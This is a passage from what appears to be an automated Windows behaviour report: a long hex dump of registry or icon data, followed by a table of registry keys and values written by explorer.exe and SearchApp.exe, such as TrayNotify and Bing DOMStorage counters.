00000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060606060a0a0a0a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060606060ffffffff60606060000000000000000030303030868686869999999999999999999999999999999999999999999999999999999999999999babababaffffffff60606060303030300a0a0a0a3c3c3c3c9e9e9e9e9999999999999999999999999999999999999999999999999999999999999999babababaffffffff606060603a3a3a3a999999996b6b6b6b464646467d7d7d7d8c8c8c8ca6a6a6a69999999999999999999999999999999999999999babababaffffffff606060603a3a3a3aa6a6a6a69b9b9b9b7d7d7d7d6666666666666666666666666c6c6c6c8c8c8c8c9b9b9b9b9b9b9b9b99999999babababaffffffff60606060404040409f9f9f9f8e8e8e8e808080808080808066666666666666666666666666666666666666666666666684848484b7b7b7b7ffffffff606060603030303097979797808080808080808080808080787878785a5a5a5a66666666666666666666666666666666666666669c9c9c9cffffffff606060602626262687878787808080808080808080808080808080802828282820202020666666666666666666666666666666669c9c9c9cffffffff606060601d1d1d1d4d4d4d4d535353536a6a6a6a6b6b6b6b40404040101010100000000000000000202020205a5a5a5a69696969a0a0a0a0ffffffff606060601d1d1d1d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d3a3a3a3a00000000000000000000000000000000000000000000000063636363ffffffff606060601d1d1d1d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d484848480e0e0e0e000000000000000000000000000000000000000060606060ffffffff606060600a0a0a0a4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d444444440e0e0e0e000000000000000000000000000000000000000000000000a0a0a0a06060606000000000000000000000000013131313131313130e0e0e0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000056565678888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf4d4d4d6c33333348888888bf6f6f6f9b2b2b2b3c888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf6a6a6a953737374d888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf808080b4888888bf888888bf808080b30909090c6c6c6c97888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf787878a8111111186f6f6f9c888888bf888888bf5e5e5e831010101711111118888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf4d4d4d6c000000000909090c4d4d4d6c888888bf888888bf888888bf101010176363638b888888bf888888bf888888bf828282b65c5c5c81696969934545456000000000000000000000000011111118888888bf888888bf888888bf6f6f6f9b0808080b4242425d4f4f4f6e4c4c4c6b111111182222222f1515151e000000000000000000000000000000000000000067676790888888bf888888bf888888bf838383b96a6a6a956666668f6666668f777777a7888888bf3c3c3c5400000000000000000000000000000000000000000909090c565656786767679056565678808080b4888888bf888888bf888888bf888888bf808080b40909090c0000000000000000000000000000000000000000000000000000000000000000000000001a1a1a24787878a8888888bf888888bf676767901a1a1a240000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400200000100010000000000000900000000000000000000000000000000000000000000ffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000f0410000c00000008190000093800000138400000000000033c1000077fe000077ee000033cc00000000000013c8000093c9000081810000c0030000f00f0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000fff100008000000000000000000000000000000000000000000000000001000080070000e0070000c00f0000ce3f0000ffff0000ffff0000ffff0000ffff0000ffff0000ffff0000f0000000000000000000000000000000000100000003000080070000c0070000c0070000fc0f0000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff00000000000000000000000000000000000000000000000001000000080000001800000007000000d4000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000010000000000000001000000000000000100000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "140" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "9852" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "9852" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "4051" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "4051" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{54877B69-094E-46DB-BBD6-85AB58A41C20} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "173" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "173" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "173" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "4051" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133065036373276371" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "888" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "9852" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
